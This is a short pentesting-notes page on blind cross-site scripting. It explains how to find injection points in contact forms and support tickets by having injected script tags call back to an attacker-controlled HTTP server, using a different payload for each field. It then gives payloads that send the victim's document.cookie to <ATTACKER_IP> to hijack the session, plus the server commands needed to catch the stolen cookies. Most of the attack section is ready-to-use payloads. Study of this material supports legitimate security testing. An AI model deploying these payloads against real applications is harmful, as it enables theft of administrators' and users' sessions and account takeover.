đź’ĄCyb3rBook

BLIND XSS

3 min read

PRIMARY CATEGORY → XSS

Theory

When we are facing a Blind XSS, which means that we cannot see our input reflected in the body of the HTTP response ( i.e. Reflected XSS or Stored XSS ) or try to modify the current DOM via javascript ( i.e. Dom-Based XSS ), the given vulnerability is triggered on a page where we do not have access to

And it usually occurs on contact forms, reviews, user details, support tickets and so on

Since we cannot see how our input ( i.e payload ) is displayed in the HTTP response, we can use a javascript payload that sends an HTTP request back to our server

JS Payload

<script src="http://<ATTACKER_IP_>:<PORT>"></script>

HTTP Server

python3 -m http.server 80

If we get a response on our HTTP server, then the endpoint where the data is send is certainly vulnerable

If so, we can modify the previous payload for one that sends a request to a javascript code hosted on our server

<script src="http://<ATTACKER_IP>:<PORT>/<JS_SCRIPT>"></script>
// OR
<img src=x onerror="var s=document.createElement('script'); s.src='http://<ATTACKER_IP>:<PORT>/<JS_SCRIPT>'; document.body.appendChild(s);">

The caveat of this approach is that we have to try several payloads until we find the right one. Therefore, we have the following list of payloads

PayloadAllTheThings

Since we do not know the context where our input is loaded, this is a good way to assess a possible injection point

Another drawback is that if we are facing a contact form that is periodically reviewed by an agent or administrator, we will not know which of all fields is vulnerable, at least if we enter the same payload in all fields

However, we can send a different payload for each field. All payloads will request a resource hosted on the operator’s HTTP server. This resource will be the name of the field

For instance, we have a contact form with three fields, namely username, email and subject

We can send the following payloads

<script src="http://<ATTACKER_IP>:<PORT>/username"></script>
<script src="http://<ATTACKER_IP>:<PORT>/email"></script>
<script src="http://<ATTACKER_IP>:<PORT>/subject"></script>

If we receive a request for any of these resources, then we will know the vulnerable one

Otherwise, we have to try again with a different type of payload, such as those mentioned previously

Abuse

Session Hijacking

As we all know, the vast majority of web application handle the user sessions with cookies

The latter means that users do not have to log in to the web application every time they start their browser

However, this means that any attacker who steals the session cookie will be able to impersonate the user and takeover the entire account, which is called a Session Hijacking

So, once we have detected the vulnerable endpoint, we can proceed to the XXS Exploitation and hence, to the Session Hijacking

We have several javascript payloads to exfiltrate the session cookie by sending it to our HTTP Server

document.location = 'http://<ATTACKER_IP>:<PORT>/index.php?c=' + document.cookie
new Image().src = "http://<ATTACKER_IP>:<PORT>/index.php?c=" + document.cookie

So, we have to carry out the following steps in order to complete the attack

Setting up an HTTP Server
python3 -m http.server <PORT>
Writing the JS Payload to a hosted file

e.g. script.js

new Image().src = "http://<ATTACKER_IP>:<PORT>/index.php?c=" + document.cookie
Sending the XSS Payload
<script src="http://<ATTACKER_IP>:<PORT>/script.js"></script>
// OR
<img src=x onerror="var s=document.createElement('script'); s.src='http://<ATTACKER_IP>:<PORT>/script.js'; document.body.appendChild(s);">

Graph View

Backlinks